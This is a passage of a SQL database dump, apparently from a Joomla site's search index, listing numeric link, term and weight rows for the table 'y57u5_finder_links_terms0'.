(258, 295195, 0.93331),
(258, 295196, 1.05),
(258, 295197, 2.00662),
(258, 295198, 0.79331),
(299, 295198, 0.79331),
(292, 295198, 1.58662),
(258, 295199, 0.91),
(292, 295199, 1.82),
(258, 295200, 0.84),
(258, 295201, 0.95669),
(258, 295202, 1.05),
(258, 295203, 1.02669),
(258, 295204, 1.12),
(258, 295205, 1.07331),
(258, 295206, 1.05),
(258, 295207, 1.02669),
(258, 295208, 0.91),
(258, 295209, 1.00331),
(258, 295210, 0.93331),
(258, 295211, 1.00331),
(258, 295212, 1.09669),
(258, 295213, 1.16669),
(258, 295214, 0.95669),
(258, 295215, 1.02669),
(258, 295216, 0.93331),
(258, 295217, 1.00331),
(258, 295218, 0.95669),
(258, 295219, 1.02669),
(258, 295220, 1.00331),
(258, 295221, 1.00331),
(258, 295222, 1.02669),
(258, 295223, 0.95669),
(258, 295224, 0.95669),
(258, 295225, 0.86331),
(292, 295225, 1.72662),
(258, 295226, 0.98),
(292, 295226, 1.96),
(258, 295227, 1.00331),
(258, 295228, 1.07331),
(258, 295229, 0.88669),
(258, 295230, 0.95669),
(258, 295231, 0.88669),
(258, 295232, 1.05),
(258, 295233, 0.95669),
(258, 295234, 1.09669),
(258, 295235, 1.05),
(258, 295236, 1.05),
(258, 295237, 1.05),
(258, 295607, 5.3332),
(258, 295608, 0.91),
(258, 295609, 1.02669),
(258, 295610, 0.91),
(258, 295611, 1.05),
(258, 295612, 1.05),
(258, 295613, 1.26),
(258, 295614, 0.95669),
(292, 295614, 0.95669),
(258, 295615, 0.81669),
(258, 295616, 0.86331),
(258, 295617, 1.00331),
(258, 295618, 0.95669),
(258, 295619, 1.07331),
(258, 295620, 0.95669),
(292, 295620, 0.95669),
(258, 295621, 1.09669),
(292, 295621, 1.09669),
(258, 295622, 0.98),
(258, 295623, 1.02669),
(288, 295624, 0.88669),
(290, 295624, 0.88669),
(305, 295624, 0.88669),
(258, 295624, 1.77338),
(258, 295625, 1.02669),
(258, 295626, 1.00331),
(258, 295627, 1.02669),
(258, 295628, 0.74662),
(258, 295629, 0.98),
(258, 295630, 1.14331),
(258, 295631, 1.09669),
(258, 295632, 1.19),
(258, 295633, 1.07331),
(258, 295634, 0.93331),
(258, 295635, 1.14331),
(258, 295636, 0.88669),
(292, 295636, 1.77338),
(258, 295637, 0.98),
(292, 295637, 1.96),
(258, 295638, 0.91),
(258, 295639, 1.00331),
(258, 295640, 0.93331),
(258, 295641, 0.98),
(258, 295642, 0.98),
(292, 295642, 1.96),
(258, 295643, 0.93324),
(258, 295644, 0.98),
(258, 295645, 1.07331),
(258, 295646, 0.88669),
(258, 295647, 1.02669),
(258, 295648, 0.88669),
(258, 295649, 0.95669),
(258, 295650, 0.88669),
(258, 295651, 1.12),
(258, 295652, 0.46669),
(258, 295653, 1.07331),
(258, 295654, 1.16669),
(258, 295655, 0.86331),
(258, 295656, 0.95669),
(258, 295657, 1.02669),
(258, 295658, 1.12),
(258, 295659, 0.37331),
(258, 295660, 0.95669),
(258, 295661, 1.02669),
(258, 295662, 0.95669),
(258, 295663, 1.05),
(258, 295664, 1.02669),
(258, 295665, 1.07331),
(258, 295666, 1.16669),
(258, 295667, 0.37331),
(258, 295668, 1.00331),
(258, 295669, 1.16669),
(258, 295670, 0.37331),
(258, 295671, 1.00331),
(258, 295672, 1.12),
(258, 295673, 0.42),
(258, 295674, 1.02669),
(258, 295675, 1.23669),
(258, 295676, 2.14662),
(258, 295677, 0.37331),
(258, 295678, 1.00331),
(258, 295679, 1.05),
(258, 295680, 1.05),
(260, 296213, 1.23669),
(260, 296214, 1.4),
(260, 296215, 0.65331),
(260, 296216, 1.23669),
(260, 296217, 1.4),
(261, 296244, 0.93331),
(288, 296244, 1.86662),
(261, 296245, 1.05),
(261, 296246, 0.91),
(261, 296247, 0.93331),
(261, 296248, 1.02669),
(261, 296249, 0.95669),
(261, 296250, 1.12),
(261, 296251, 0.91),
(261, 296252, 1.00331),
(261, 296253, 0.91),
(261, 296254, 1.02669),
(261, 296255, 1.07331),
(261, 296256, 1.16669),
(261, 296257, 0.88669),
(287, 296257, 0.88669),
(261, 296258, 1.00331),
(261, 296259, 0.91),
(261, 296260, 1.02669),
(261, 296261, 0.86331),
(261, 296262, 1.02669),
(261, 296263, 0.95669),
(261, 296264, 1.05),
(261, 296265, 1.02669),
(305, 296265, 1.02669),
(261, 296266, 1.12),
(261, 296267, 1.05),
(261, 296268, 1.12),
(261, 296269, 0.98),
(261, 296270, 0.98),
(261, 296271, 0.23331),
(261, 296272, 1.05),
(261, 296273, 1.14331),
(261, 296274, 0.91),
(261, 296275, 1.05),
(261, 296276, 1.02669),
(261, 296277, 1.02669),
(261, 296278, 1.82),
(261, 296279, 1.96),
(261, 296280, 1.05),
(261, 296281, 1.05),
(261, 296282, 1.00331),
(261, 296283, 0.98),
(261, 296284, 1.09669),
(261, 296285, 0.93331),
(261, 296286, 1.00331),
(261, 296287, 1.00331),
(261, 296288, 1.00331),
(288, 296288, 1.00331),
(261, 296289, 0.95669),
(261, 296290, 0.93331),
(261, 296291, 1.05),
(261, 296292, 1.02669),
(261, 296293, 1.09669),
(261, 296294, 1.12),
(261, 296295, 1.28331),
(261, 296296, 1.19),
(261, 296297, 1.23669),
(261, 296298, 1.35331),
(261, 296299, 1.02669),
(306, 296299, 1.02669),
(261, 296300, 1.14331),
(261, 296301, 1.12),
(306, 296302, 1.00331),
(261, 296302, 8.02648),
(261, 296303, 1.14331),
(261, 296304, 1.23669),
(261, 296305, 1.07331),
(261, 296306, 5.6),
(261, 296307, 5.6),
(261, 296308, 1.21331),
(261, 296309, 1.37669),
(261, 296310, 1.28331),
(261, 296311, 1.21331),
(261, 296312, 1.35331),
(261, 296313, 1.05),
(261, 296314, 1.14331),
(261, 296315, 1.26),
(261, 296316, 2.1),
(261, 296317, 1.14331),
(261, 296318, 1.16669),
(261, 296319, 1.05),
(261, 296320, 1.21331),
(261, 296321, 1.05),
(261, 296322, 1.26),
(261, 296323, 1.21331),
(261, 296324, 1.28331),
(261, 296325, 1.05),
(261, 296326, 1.23669),
(261, 296327, 1.16669),
(261, 296328, 1.02669),
(261, 296329, 1.21331),
(261, 296330, 2.28662),
(261, 296331, 1.26),
(261, 296332, 1.23669),
(261, 296333, 1.12),
(261, 296334, 1.09669),
(261, 296732, 0.98),
(261, 296733, 1.07331),
(261, 296734, 0.86331),
(261, 296735, 1.07331),
(261, 296736, 0.95669),
(261, 296737, 1.02669),
(261, 296738, 1.14331),
(261, 296739, 1.07331),
(261, 296740, 2.24),
(261, 296741, 2.38),
(261, 296742, 1.14331),
(261, 296743, 1.21331),
(261, 296744, 1.02669),
(261, 296745, 1.26),
(261, 296746, 0.95669),
(261, 296747, 1.05),
(261, 296748, 1.09669),
(261, 296749, 1.16669),
(261, 296750, 0.98),
(261, 296751, 1.09669),
(261, 296752, 0.95669),
(261, 296753, 1.12),
(261, 296754, 0.98),
(261, 296755, 1.23669),
(261, 296756, 0.42),
(261, 296757, 1.07331),
(261, 296758, 1.19),
(261, 296759, 0.51331),
(290, 296759, 0.51331),
(261, 296760, 1.02669),
(261, 296761, 1.09669),
(261, 296762, 1.05),
(261, 296763, 1.12),
(261, 296764, 0.88669),
(261, 296765, 0.98),
(261, 296766, 1.82),
(261, 296767, 1.00331),
(261, 296768, 1.14331),
(261, 296769, 0.95669),
(288, 296769, 0.95669),
(261, 296770, 1.82),
(261, 296771, 1.00331),
(261, 296772, 1.02669),
(261, 296773, 1.00331),
(261, 296774, 1.16669),
(261, 296775, 0.98),
(261, 296776, 1.05),
(261, 296777, 0.98),
(261, 296778, 1.09669),
(261, 296779, 1.00331),
(261, 296780, 0.95669),
(261, 296781, 1.02669),
(261, 296782, 1.26),
(261, 296783, 1.33),
(261, 296784, 0.93331),
(261, 296785, 1.00331),
(261, 296786, 0.32669),
(261, 296787, 0.95669),
(261, 296788, 1.02669),
(261, 296789, 0.98),
(261, 296790, 1.07331),
(261, 296791, 0.98),
(261, 296792, 1.12),
(261, 296793, 0.98),
(261, 296794, 1.05),
(261, 296795, 1.02669),
(261, 296796, 1.12),
(261, 296797, 1.05),
(261, 296798, 1.14331),
(261, 296799, 0.88669),
(261, 296800, 1.02669),
(261, 296801, 0.37331),
(261, 296802, 0.98),
(261, 296803, 1.07331),
(262, 297302, 0.93331),
(262, 297303, 1.07331),
(262, 297304, 1.91338),
(262, 297305, 1.77338),
(262, 297306, 2.1),
(262, 297307, 2.66007),
(262, 297308, 1.07331),
(262, 297309, 1.00331),
(262, 297310, 0.98),
(262, 297311, 1.86662),
(262, 297312, 0.84),
(262, 297313, 0.91),
(262, 297314, 1.68),
(262, 297315, 1.86662),
(262, 297316, 1.00331),
(262, 297317, 0.98),
(262, 297318, 1.05),
(262, 297319, 0.93331),
(262, 297320, 1.09669),
(262, 297321, 0.93331),
(262, 297322, 1.00331),
(262, 297323, 0.98),
(262, 297324, 1.14331),
(262, 297325, 1.05),
(262, 297326, 0.84),
(262, 297327, 1.00331),
(262, 297328, 1.07331),
(262, 297329, 1.23669),
(262, 297330, 0.93331),
(262, 297331, 0.98),
(262, 297332, 1.16669),
(262, 297333, 1.09669),
(262, 297334, 0.91),
(262, 297335, 1.02669),
(262, 297336, 1.82),
(262, 297337, 1.05),
(262, 297338, 1.09669),
(262, 297339, 0.95669),
(262, 297340, 1.05),
(262, 297341, 0.88669),
(262, 297342, 0.95669),
(262, 297343, 1.19),
(262, 297344, 0.91),
(262, 297345, 0.98),
(262, 297346, 1.02669),
(262, 297347, 1.16669),
(262, 297348, 0.95669),
(262, 297349, 1.05),
(262, 297350, 0.93331),
(262, 297351, 0.98),
(262, 297352, 1.77338),
(262, 297353, 0.98),
(262, 297354, 0.98),
(262, 297355, 1.02669),
(262, 297356, 0.91),
(262, 297357, 1.02669),
(262, 297358, 0.98),
(262, 297359, 1.09669),
(262, 297360, 0.98),
(262, 297361, 1.12),
(262, 297362, 0.91),
(290, 297362, 0.91),
(262, 297363, 1.14331),
(262, 297364, 0.95669),
(262, 297365, 1.12),
(262, 297366, 0.88669),
(262, 297367, 1.19),
(262, 297368, 0.88669),
(262, 297369, 0.98),
(262, 297370, 1.82),
(262, 297371, 1.96),
(262, 297372, 0.95669),
(262, 297373, 0.88669),
(262, 297374, 1.16669),
(262, 297375, 1.05),
(262, 297376, 1.09669),
(262, 297377, 0.93331),
(262, 297378, 1.05),
(262, 297379, 0.93331),
(262, 297380, 1.05),
(262, 297381, 0.98),
(262, 297382, 0.88669),
(290, 297382, 0.88669),
(262, 297383, 1.16669),
(262, 297384, 0.95669),
(262, 297385, 1.05),
(262, 297386, 0.98),
(262, 297387, 1.07331),
(262, 297388, 0.98),
(306, 297388, 0.98),
(262, 297389, 1.00331),
(262, 297390, 1.00331),
(262, 297391, 1.05),
(262, 297392, 0.98),
(262, 297393, 1.09669),
(262, 297394, 0.98),
(262, 297395, 0.93331),
(262, 297396, 1.14331),
(262, 297397, 1.12),
(262, 297398, 1.16669),
(262, 297399, 1.00331),
(262, 297400, 0.95669),
(262, 297401, 1.12),
(262, 297402, 0.88669),
(262, 297403, 0.95669),
(262, 297404, 1.12),
(262, 297405, 0.23331),
(262, 297406, 0.88669),
(262, 297407, 1.00331),
(262, 297408, 2.87007),
(262, 297409, 0.91),
(262, 297410, 1.12),
(262, 297411, 0.65338),
(262, 297412, 1.86662),
(262, 297413, 2.1),
(262, 297414, 1.00331),
(262, 297415, 1.21331),
(262, 297416, 0.32669),
(262, 297417, 0.95669),
(262, 297418, 1.07331),
(262, 297419, 0.86331),
(262, 297420, 1.02669),
(262, 297923, 5.3332),
(262, 297924, 0.95669),
(262, 297925, 1.02669),
(262, 297926, 0.88669),
(262, 297927, 0.95669),
(262, 297928, 0.14),
(262, 297929, 0.86331),
(262, 297930, 0.95669),
(262, 297931, 0.14),
(262, 297932, 0.84),
(262, 297933, 0.93331),
(262, 297934, 0.98),
(262, 297935, 1.00331),
(262, 297936, 1.07331),
(262, 297937, 1.02669),
(262, 297938, 1.14331),
(262, 297939, 0.18669),
(262, 297940, 0.86331),
(262, 297941, 1.09669),
(262, 297942, 1.12),
(262, 297943, 1.30669),
(262, 297944, 1.02669),
(262, 297945, 1.96),
(262, 297946, 2.14662),
(262, 297947, 1.72662),
(262, 297948, 1.96),
(262, 297949, 0.18669),
(262, 297950, 0.86331),
(262, 297951, 0.93331),
(262, 297952, 4.43345),
(262, 297953, 2.00662),
(262, 297954, 2.05338),
(262, 297955, 1.00331),
(262, 297956, 1.07331),
(262, 297957, 1.14331),
(262, 297958, 0.93331),
(262, 297959, 1.05),
(262, 297960, 0.86331),
(262, 297961, 0.98),
(262, 297962, 0.32669),
(262, 297963, 1.02669),
(262, 297964, 1.19),
(262, 297965, 0.91),
(262, 297966, 1.02669),
(262, 297967, 0.93331),
(262, 297968, 1.00331),
(262, 297969, 0.88669),
(262, 297970, 1.07331),
(262, 297971, 1.07331),
(262, 297972, 0.88669),
(262, 297973, 1.07331),
(262, 297974, 1.05),
(262, 297975, 1.02669),
(262, 297976, 0.95669),
(262, 297977, 1.09669),
(262, 297978, 1.00331),
(262, 297979, 1.12),
(262, 297980, 1.00331),
(262, 297981, 1.12),
(262, 297982, 1.21331),
(262, 297983, 0.91),
(262, 297984, 1.00331),
(262, 297985, 1.02669),
(262, 297986, 2.00662),
(262, 297987, 1.05),
(262, 297988, 7.46648),
(262, 297989, 1.07331),
(262, 297990, 1.02669),
(262, 297991, 1.00331),
(262, 297992, 1.12),
(262, 297993, 1.12),
(262, 297994, 1.00331),
(262, 297995, 1.16669),
(262, 297996, 1.00331),
(262, 297997, 1.02669),
(262, 297998, 1.07331),
(262, 297999, 0.95669),
(262, 298000, 1.02669),
(262, 298001, 0.98),
(262, 298002, 1.12),
(262, 298003, 1.91338),
(262, 298004, 1.02669),
(262, 298005, 0.93331),
(262, 298006, 1.00331),
(262, 298007, 0.95669),
(262, 298008, 1.02669),
(262, 298009, 0.95669),
(262, 298010, 1.05),
(262, 298011, 0.98),
(262, 298012, 1.09669),
(262, 298013, 1.05),
(262, 298014, 1.14331),
(262, 298015, 1.09669),
(262, 298016, 0.93331),
(262, 298017, 1.02669),
(262, 298018, 1.02669),
(262, 298019, 0.95669),
(262, 298020, 1.02669),
(262, 298021, 0.95669),
(262, 298022, 1.07331),
(262, 298023, 0.37331),
(262, 298024, 1.07331),
(262, 298025, 1.14331),
(262, 298026, 0.95669),
(262, 298027, 1.02669),
(262, 298028, 1.09669),
(262, 298029, 1.19),
(262, 298030, 1.4),
(262, 298031, 2.24),
(262, 298032, 1.02669),
(262, 298033, 1.09669),
(262, 298034, 1.07331),
(262, 298035, 1.16669),
(262, 298036, 1.05),
(262, 298037, 1.12),
(262, 298038, 0.95669),
(262, 298039, 1.07331),
(262, 298040, 0.28),
(262, 298041, 0.93331),
(262, 298042, 1.12),
(262, 298043, 1.00331),
(262, 298044, 1.12),
(262, 298045, 0.86331),
(262, 298046, 1.12),
(262, 298047, 1.14331),
(262, 298048, 0.93331),
(262, 298049, 1.05),
(306, 298050, 0.95669),
(262, 298050, 1.91338),
(262, 298051, 2.14662),
(262, 298052, 1.86676),
(262, 298053, 4.2),
(262, 298054, 3.63993),
(262, 298055, 1.28331),
(262, 298056, 1.14331),
(262, 298057, 1.28331),
(262, 298058, 0.91),
(262, 298059, 1.02669),
(262, 298060, 0.91),
(262, 298061, 1.14331),
(262, 298062, 2.00662),
(262, 298063, 1.09669),
(262, 298064, 1.07331),
(262, 298065, 0.98),
(262, 298066, 1.09669),
(262, 298067, 1.00331),
(262, 298068, 1.07331),
(262, 298069, 1.05),
(262, 298070, 1.12),
(262, 298071, 1.07331),
(262, 298072, 1.16669),
(262, 298073, 1.16669),
(262, 298074, 0.93331),
(262, 298075, 1.12),
(262, 298076, 0.88669),
(262, 298077, 1.07331),
(262, 298078, 0.32669),
(304, 298078, 0.32669),
(262, 298079, 0.98),
(262, 298080, 1.05),
(262, 298081, 0.91),
(262, 298082, 1.00331),
(262, 298083, 1.91338),
(262, 298084, 2.05338),
(263, 299351, 0.93331),
(263, 299352, 1.00331),
(263, 299353, 0.84),
(263, 299354, 1.02669),
(263, 299355, 0.95669),
(263, 299356, 1.02669),
(263, 299357, 2.52),
(263, 299358, 0.91),
(263, 299359, 0.93331),
(263, 299360, 0.95669),
(263, 299361, 0.98),
(263, 299362, 1.14331),
(263, 299363, 0.84),
(263, 299364, 0.93331),
(263, 299365, 1.09669),
(263, 299366, 1.19),
(263, 299367, 0.84),
(263, 299368, 0.91),
(263, 299369, 0.93331),
(263, 299370, 1.07331),
(263, 299371, 0.95669),
(263, 299372, 1.07331),
(263, 299373, 0.88669),
(263, 299374, 1.09669),
(263, 299375, 0.37331),
(263, 299376, 0.98),
(263, 299377, 1.12),
(263, 299378, 1.91338),
(263, 299379, 2.19338),
(263, 299380, 0.91),
(263, 299381, 1.00331),
(263, 299382, 0.14),
(263, 299383, 0.84),
(263, 299384, 0.93331),
(263, 299385, 0.23331),
(263, 299386, 1.00331),
(263, 299387, 1.07331),
(263, 299388, 0.91),
(263, 299389, 1.02669),
(263, 299390, 0.98),
(263, 299391, 1.09669),
(263, 299392, 0.60669),
(263, 299393, 1.12),
(263, 299394, 1.21331),
(263, 299395, 1.07331),
(263, 299396, 1.14331),
(263, 299397, 0.91),
(263, 299398, 0.98),
(263, 299399, 1.00331),
(263, 299400, 1.12),
(263, 299401, 1.05),
(263, 299402, 0.95669),
(263, 299403, 1.14331),
(263, 299404, 1.35331),
(263, 299405, 0.98),
(263, 299406, 0.98),
(263, 299407, 1.00331),
(263, 299408, 1.09669),
(263, 299409, 1.09669),
(263, 299410, 1.16669),
(263, 299411, 0.95669),
(263, 299412, 1.05),
(263, 299413, 0.95669),
(263, 299414, 1.02669),
(263, 299415, 0.95669),
(263, 299416, 1.09669),
(263, 299417, 1.05),
(263, 299418, 1.07331),
(263, 299419, 1.02669),
(263, 299420, 0.88669),
(263, 299421, 0.86331),
(263, 299422, 0.93331),
(263, 299423, 1.09669),
(263, 299424, 0.93331),
(263, 299425, 0.95669),
(305, 299425, 0.95669),
(263, 299426, 0.88669),
(263, 299427, 1.12),
(263, 299428, 0.84),
(263, 299429, 0.93331),
(263, 299430, 0.98),
(263, 299431, 1.00331),
(263, 299432, 1.12),
(263, 299433, 1.21331),
(263, 299873, 0.84),
(263, 299874, 0.93331),
(263, 299875, 0.84),
(263, 299876, 0.98),
(263, 299877, 0.93331),
(263, 299878, 1.00331),
(263, 299879, 0.88669),
(263, 299880, 1.05),
(263, 299881, 0.23331),
(263, 299882, 0.86331),
(263, 299883, 0.95669),
(263, 299884, 0.95669),
(263, 299885, 1.05),
(263, 299886, 0.84),
(306, 299886, 0.84),
(263, 299887, 0.93331),
(263, 299888, 0.93331),
(263, 299889, 1.02669),
(263, 299890, 1.12),
(263, 299891, 0.95669),
(263, 299892, 0.93331),
(263, 299893, 1.05),
(263, 299894, 0.93331),
(263, 299895, 0.88669),
(263, 299896, 1.07331),
(263, 299897, 0.86331),
(263, 299898, 0.95669),
(263, 299899, 0.91),
(263, 299900, 1.09669),
(263, 299901, 0.98),
(263, 299902, 1.09669),
(263, 299903, 0.88669),
(263, 299904, 1.02669),
(263, 299905, 0.91),
(263, 299906, 1.00331),
(263, 299907, 0.91),
(263, 299908, 0.95669),
(263, 299909, 0.88669),
(263, 299910, 1.00331),
(263, 299911, 0.46669),
(263, 299912, 1.09669),
(263, 299913, 1.21331),
(263, 299914, 0.46669),
(263, 299915, 1.02669),
(263, 299916, 1.12),
(263, 299917, 0.98),
(263, 299918, 1.09669),
(263, 299919, 0.56),
(263, 299920, 1.07331),
(263, 299921, 1.16669),
(263, 299922, 0.91),
(263, 299923, 1.09669),
(264, 300363, 0.91),
(306, 300363, 0.91),
(264, 300364, 1.00331),
(264, 300365, 1.82),
(264, 300366, 2.24),
(264, 300367, 1.09669),
(264, 300368, 0.28),
(264, 300369, 0.88669),
(264, 300370, 1.07331),
(264, 300371, 1.05),
(264, 300372, 1.30669),
(264, 300373, 0.91),
(264, 300374, 1.12),
(264, 300375, 1.02669),
(264, 300376, 1.12),
(264, 300377, 0.91),
(264, 300378, 1.02669),
(264, 300379, 0.84),
(264, 300380, 0.93331),
(264, 300381, 0.81669),
(264, 300382, 1.00331),
(264, 300383, 0.88669),
(264, 300384, 0.93331),
(264, 300385, 0.93331),
(264, 300386, 0.98),
(264, 300387, 1.21331),
(264, 300388, 1.05),
(264, 300389, 1.12),
(264, 300390, 0.93331),
(264, 300391, 1.05),
(264, 300392, 1.09669),
(264, 300393, 1.00331),
(264, 300394, 1.14331),
(264, 300395, 0.86331),
(264, 300396, 0.95669),
(264, 300397, 1.02669),
(264, 300398, 1.16669),
(264, 300399, 0.46669),
(264, 300400, 1.00331),
(264, 300401, 1.16669),
(264, 300402, 1.07331),
(264, 300403, 0.98),
(304, 300403, 0.98),
(264, 300404, 1.07331),
(264, 300688, 0.91),
(264, 300689, 1.00331),
(264, 300690, 1.82),
(264, 300691, 1.05),
(264, 300692, 1.00331),
(264, 300693, 1.09669),
(264, 300694, 1.05),
(264, 300695, 1.14331),
(264, 300696, 0.93331),
(264, 300697, 0.98),
(264, 300698, 0.88669),
(264, 300699, 1.00331),
(264, 300700, 0.91),
(264, 300701, 1.09669),
(264, 300702, 0.46669),
(264, 300703, 1.02669),
(264, 300704, 1.14331),
(264, 300705, 0.88669),
(264, 300706, 1.07331),
(264, 300707, 0.88669),
(264, 300708, 0.98),
(264, 300709, 1.02669),
(264, 300710, 1.09669),
(264, 300711, 0.42),
(306, 300711, 0.42),
(264, 300712, 1.05),
(264, 300713, 1.14331),
(264, 300714, 2.28662),
(264, 300715, 1.35331),
(264, 300716, 1.21331),
(264, 300717, 0.95669),
(264, 300718, 1.02669),
(266, 300857, 5.3332),
(267, 300881, 0.91),
(267, 300882, 0.98),
(267, 300883, 1.02669),
(267, 300884, 0.93331),
(267, 300885, 0.91),
(267, 300886, 0.98),
(267, 300887, 0.98),
(267, 300888, 0.91),
(267, 300889, 0.98),
(267, 300890, 1.02669);
INSERT INTO `y57u5_finder_links_terms0` (`link_id`, `term_id`, `weight`) VALUES
(267, 300891, 1.21331),
(267, 300892, 1.05),
(305, 300892, 2.1),
(267, 300893, 1.23669),
(267, 300894, 0.84),
(267, 300895, 0.88669),
(267, 300896, 0.86331),
(267, 300897, 1.02669),
(267, 300898, 1.02669),
(267, 300899, 1.07331),
(267, 300900, 1.05),
(267, 300901, 1.05),
(267, 300902, 0.88669),
(267, 300903, 1.07331),
(267, 300904, 0.93331),
(267, 300905, 1.02669),
(267, 300906, 1.00331),
(267, 300907, 1.02669),
(267, 300908, 1.07331),
(267, 300909, 1.02669),
(267, 300910, 1.16669),
(267, 300911, 0.88669),
(267, 300912, 1.00331),
(267, 300913, 0.88669),
(267, 300914, 1.09669),
(267, 300915, 0.95669),
(267, 300916, 0.98),
(267, 300917, 0.98),
(267, 300918, 1.09669),
(267, 300919, 0.93331),
(267, 300920, 1.00331),
(267, 300921, 1.00331),
(267, 300922, 1.16669),
(267, 300923, 1.02669),
(267, 300924, 1.12),
(267, 300925, 1.05),
(267, 300926, 0.88669),
(267, 300927, 1.02669),
(267, 300928, 0.93331),
(267, 300929, 1.00331),
(267, 300930, 0.98),
(267, 300931, 1.09669),
(267, 300932, 1.09669),
(267, 300933, 0.84),
(267, 300934, 0.98),
(267, 300935, 0.88669),
(267, 300936, 1.02669),
(267, 300937, 0.95669),
(267, 300938, 1.07331),
(267, 300939, 1.02669),
(267, 300940, 0.91),
(267, 300941, 0.86331),
(267, 300942, 0.95669),
(267, 300943, 1.02669),
(267, 300944, 1.12),
(267, 300945, 1.19),
(267, 301350, 5.3332),
(267, 301351, 1.07331),
(267, 301352, 1.14331),
(267, 301353, 0.7),
(267, 301354, 1.14331),
(267, 301355, 1.4),
(267, 301356, 0.65331),
(267, 301357, 1.09669),
(267, 301358, 1.19),
(267, 301359, 0.93331),
(267, 301360, 1.05),
(267, 301361, 0.88669),
(267, 301362, 0.95669),
(267, 301363, 0.18669),
(306, 301363, 0.18669),
(267, 301364, 0.95669),
(267, 301365, 1.07331),
(267, 301366, 0.95669),
(267, 301367, 1.02669),
(267, 301368, 1.02669),
(267, 301369, 1.37669),
(267, 301370, 0.91),
(267, 301371, 1.02669),
(267, 301372, 0.93331),
(267, 301373, 1.00331),
(267, 301374, 0.98),
(267, 301375, 0.98),
(267, 301376, 1.12),
(267, 301377, 0.98),
(267, 301378, 0.95669),
(267, 301379, 1.07331),
(267, 301380, 1.00331),
(267, 301381, 1.09669),
(267, 301382, 1.96),
(304, 301382, 1.96),
(267, 301383, 1.02669),
(267, 301384, 1.05),
(267, 301385, 1.21331),
(267, 301386, 1.26),
(267, 301387, 1.33),
(267, 301388, 0.93331),
(267, 301389, 1.09669),
(267, 301390, 1.09669),
(267, 301391, 0.98),
(267, 301392, 0.32669),
(267, 301393, 0.98),
(267, 301394, 1.05),
(268, 301897, 0.93331),
(268, 301898, 1.12),
(268, 301899, 0.88669),
(268, 301900, 0.95669),
(268, 301901, 0.86331),
(268, 301902, 1.00331),
(268, 301903, 0.95669),
(268, 301904, 1.05),
(268, 301905, 1.00331),
(268, 301906, 0.98),
(268, 301907, 0.93331),
(268, 301908, 1.12),
(268, 301909, 1.86662),
(268, 301910, 1.16669),
(268, 301911, 1.05),
(268, 301912, 0.86331),
(268, 301913, 1.02669),
(268, 301914, 1.02669),
(268, 301915, 1.14331),
(268, 301916, 0.93331),
(268, 301917, 1.02669),
(268, 301918, 0.88669),
(268, 301919, 1.00331),
(268, 301920, 1.00331),
(268, 301921, 1.19),
(268, 301922, 1.00331),
(268, 301923, 0.91),
(268, 301924, 1.02669),
(268, 301925, 1.05),
(268, 301926, 1.05),
(268, 301927, 0.46669),
(268, 301928, 1.02669),
(268, 301929, 1.21331),
(268, 301930, 0.86331),
(268, 301931, 1.00331),
(268, 301932, 0.86331),
(268, 301933, 0.98),
(268, 301934, 0.98),
(268, 301935, 1.09669),
(268, 301936, 1.00331),
(268, 301937, 1.09669),
(268, 301938, 1.05),
(268, 301939, 1.12),
(268, 301940, 0.95669),
(268, 301941, 1.21331),
(268, 301942, 1.09669),
(268, 301943, 1.91338),
(268, 301944, 1.05),
(268, 301945, 1.09669),
(268, 301946, 1.05),
(268, 301947, 1.14331),
(268, 301948, 0.88669),
(268, 301949, 0.98),
(268, 301950, 1.00331),
(268, 301951, 1.05),
(268, 301952, 1.19),
(268, 301953, 1.00331),
(268, 301954, 1.16669),
(268, 301955, 1.00331),
(268, 301956, 1.14331),
(268, 301957, 0.98),
(268, 301958, 0.98),
(268, 301959, 1.05),
(268, 301960, 0.95669),
(268, 301961, 1.05),
(268, 301962, 1.14331),
(268, 301963, 1.14331),
(268, 301964, 1.26),
(268, 301965, 0.65338),
(268, 301966, 0.95669),
(268, 301967, 1.19),
(268, 301968, 1.00331),
(268, 301969, 1.07331),
(268, 301970, 0.95669),
(306, 301970, 0.95669),
(268, 301971, 1.12),
(268, 301972, 1.00331),
(268, 301973, 1.09669),
(268, 301974, 1.02669),
(268, 301975, 1.12),
(268, 301976, 1.05),
(268, 301977, 1.21331),
(268, 301978, 0.98),
(268, 301979, 1.07331),
(268, 301980, 0.95669),
(268, 301981, 0.93331),
(268, 301982, 1.05),
(268, 301983, 0.93331),
(268, 301984, 1.07331),
(268, 301985, 0.37331),
(268, 301986, 1.00331),
(268, 301987, 1.12),
(268, 301988, 0.98),
(268, 302416, 5.3332),
(268, 302417, 0.84),
(268, 302418, 0.93331),
(268, 302419, 1.09669),
(268, 302420, 1.14331),
(268, 302421, 1.05),
(268, 302422, 1.19),
(268, 302423, 1.23669),
(268, 302424, 1.05),
(268, 302425, 1.12),
(268, 302426, 0.88669),
(268, 302427, 0.98),
(268, 302428, 0.91),
(268, 302429, 1.02669),
(268, 302430, 0.91),
(292, 302430, 0.91),
(306, 302430, 0.91),
(268, 302431, 1.02669),
(268, 302432, 0.37331),
(268, 302433, 0.98),
(268, 302434, 1.09669),
(268, 302435, 0.28),
(268, 302436, 0.91),
(268, 302437, 1.02669),
(268, 302438, 1.02669),
(268, 302439, 1.14331),
(268, 302440, 0.88669),
(268, 302441, 0.95669),
(268, 302442, 0.98),
(268, 302443, 0.93331),
(268, 302444, 1.07331),
(268, 302445, 0.74662),
(268, 302446, 1.12),
(268, 302447, 1.30669),
(268, 302448, 1.00331),
(268, 302449, 1.09669),
(268, 302450, 0.84),
(268, 302451, 1.05),
(268, 302452, 1.12),
(268, 302453, 0.98),
(268, 302454, 1.16669),
(268, 302455, 0.91),
(268, 302456, 1.12),
(305, 302457, 0.28),
(268, 302457, 0.56),
(268, 302458, 0.93331),
(268, 302459, 1.12),
(268, 302460, 0.32669),
(268, 302461, 0.98),
(268, 302462, 1.19),
(268, 302463, 0.95669),
(268, 302464, 1.07331),
(268, 302465, 1.09669),
(268, 302466, 1.16669),
(268, 302467, 0.86331),
(268, 302468, 0.98),
(268, 302469, 1.02669),
(268, 302470, 1.05),
(268, 302471, 1.02669),
(268, 302472, 1.02669),
(268, 302473, 1.05),
(268, 302474, 1.00331),
(268, 302475, 1.07331),
(268, 302476, 0.32669),
(268, 302477, 0.95669),
(268, 302478, 1.09669),
(268, 302479, 0.23331),
(268, 302480, 0.93331),
(268, 302481, 1.02669),
(268, 302482, 1.00331),
(268, 302483, 1.14331),
(269, 302917, 0.84),
(269, 302918, 0.95669),
(269, 302919, 1.86662),
(269, 302920, 2.1),
(269, 302921, 1.02669),
(269, 302922, 1.09669),
(269, 302923, 1.02669),
(269, 302924, 0.98),
(269, 302925, 0.93331),
(269, 302926, 1.00331),
(269, 302927, 1.72662),
